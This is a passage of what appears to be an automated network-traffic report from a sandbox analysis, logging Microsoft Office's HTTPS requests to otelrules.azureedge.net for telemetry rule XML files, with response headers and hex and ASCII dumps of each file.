                                                                                                      2024-10-08 18:51:40 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      121192.168.2.74983413.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:40 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:41 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:40 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1399
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                                                                                      ETag: "0x8DC582BE976026E"
                                                                                                      x-ms-request-id: 4d8e59a4-701e-0021-64fe-163d45000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185140Z-1657d5bbd48tqvfc1ysmtbdrg0000000057g00000000k666
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:41 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      122192.168.2.74983513.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:40 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:41 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:40 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1362
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                      ETag: "0x8DC582BDC13EFEF"
                                                                                                      x-ms-request-id: 4ef38422-401e-000a-160c-174a7b000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185140Z-1657d5bbd48xsz2nuzq4vfrzg800000005ag000000003yyp
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:41 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      123192.168.2.74983613.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:40 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:41 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:40 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1425
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                      ETag: "0x8DC582BE6BD89A1"
                                                                                                      x-ms-request-id: c326dec7-201e-0003-0c12-17f85a000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185140Z-1657d5bbd482krtfgrg72dfbtn000000051000000000vyg9
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:41 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      124192.168.2.74983713.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:41 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:41 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:41 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1388
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                      ETag: "0x8DC582BDBD9126E"
                                                                                                      x-ms-request-id: 75ef523f-601e-000d-02f2-162618000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185141Z-1657d5bbd4824mj9d6vp65b6n400000005q0000000000dbb
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:41 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      125192.168.2.74983813.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:41 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:41 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:41 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1415
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                                                                                                      ETag: "0x8DC582BE7C66E85"
                                                                                                      x-ms-request-id: cad35e9e-b01e-0021-3602-17cab7000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185141Z-1657d5bbd48vhs7r2p1ky7cs5w00000005m00000000109fv
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:41 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      126192.168.2.74984213.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:41 UTC192OUTGET /rules/rule702551v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:41 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:41 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1415
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                      ETag: "0x8DC582BDCE9703A"
                                                                                                      x-ms-request-id: c7b470af-b01e-005c-24fe-164c66000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185141Z-1657d5bbd48gqrfwecymhhbfm8000000045g00000000n3sy
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:41 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      127192.168.2.74984113.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:41 UTC192OUTGET /rules/rule700500v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:41 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:41 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1368
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                      ETag: "0x8DC582BE51CE7B3"
                                                                                                      x-ms-request-id: 3e7839e3-701e-0053-5cff-163a0a000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185141Z-1657d5bbd48cpbzgkvtewk0wu000000005gg000000008bgu
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:41 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      128192.168.2.74984013.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:41 UTC192OUTGET /rules/rule700501v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:41 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:41 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1405
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
                                                                                                      ETag: "0x8DC582BE89A8F82"
                                                                                                      x-ms-request-id: c9f5e5fc-201e-0071-5dfe-16ff15000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185141Z-1657d5bbd48xdq5dkwwugdpzr000000005qg00000000g0aa
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:41 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      129192.168.2.74983913.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:41 UTC192OUTGET /rules/rule702500v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:41 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:41 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1378
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                      ETag: "0x8DC582BDB813B3F"
                                                                                                      x-ms-request-id: 87e265fd-201e-0051-4fe7-167340000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185141Z-1657d5bbd48tnj6wmberkg2xy800000005g000000000a39r
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:41 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      130192.168.2.74984313.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:41 UTC192OUTGET /rules/rule702550v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:42 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:41 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1378
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                      ETag: "0x8DC582BE584C214"
                                                                                                      x-ms-request-id: dfa7567c-f01e-003f-67de-16d19d000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185141Z-1657d5bbd48xlwdx82gahegw4000000005eg0000000147vc
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
